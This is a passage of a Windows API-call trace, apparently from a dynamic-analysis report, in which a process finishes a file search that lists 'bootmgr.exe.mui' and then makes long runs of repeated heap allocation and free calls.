ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.850] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.850] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.850] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.850] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.850] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.850] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.850] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.850] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.850] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.850] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.851] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.851] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.851] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.851] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.851] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.851] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.851] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.851] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.851] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.851] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.851] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.851] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.851] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.851] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.851] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.851] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.851] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.851] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.851] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.851] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.851] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.851] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.851] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.851] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.852] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.852] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.852] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.852] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.852] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.852] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.852] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.852] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.852] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.852] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.852] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.852] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.852] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.852] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.852] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.852] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.852] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.852] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.852] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.852] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.852] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.852] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.852] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.852] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.853] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.853] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.853] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.853] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.853] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.853] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.853] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.853] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.853] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.853] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.853] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.853] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.853] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.853] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.853] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.853] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.853] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.853] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.853] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.853] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.853] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.853] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.853] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.853] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.853] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.853] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.854] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.854] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.854] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.854] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.854] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.854] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.854] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.854] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.854] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.854] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.854] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.854] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.854] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.854] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.854] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.854] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.854] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.854] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.854] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.854] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.854] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.854] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.855] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.855] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.855] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.855] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.855] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.855] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.855] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.855] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.855] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.855] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.855] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.855] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.855] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.855] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.855] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.855] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.855] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.855] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.855] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.855] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.855] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.855] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.855] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.855] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.855] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.855] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.856] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.856] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.856] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.856] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.856] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.856] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.856] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.856] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.856] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.856] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.856] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.856] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.856] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.856] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.856] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.856] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.856] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.856] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.856] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.856] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.856] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.856] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.856] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.856] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.857] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.857] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.857] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.857] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.857] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.857] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.857] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.857] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.857] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.857] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.857] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.857] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.857] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.857] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.857] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.857] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.857] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.857] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.857] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.857] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.857] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.857] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.857] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.857] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.857] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.858] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.858] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.858] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.858] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.858] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.858] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.858] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.858] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.858] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.858] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.858] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.858] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.858] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.858] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.858] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.858] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.858] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.858] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.858] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.858] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.858] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.858] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.858] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.858] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.858] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.859] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.859] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.859] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.859] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.859] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.859] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.859] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.859] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.859] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.859] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.859] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.859] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.859] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.859] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.859] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.859] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.859] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.859] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.859] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.859] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.859] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.859] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.859] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.859] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.860] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.860] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.860] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.860] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.860] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.860] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.860] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.860] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.860] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.860] 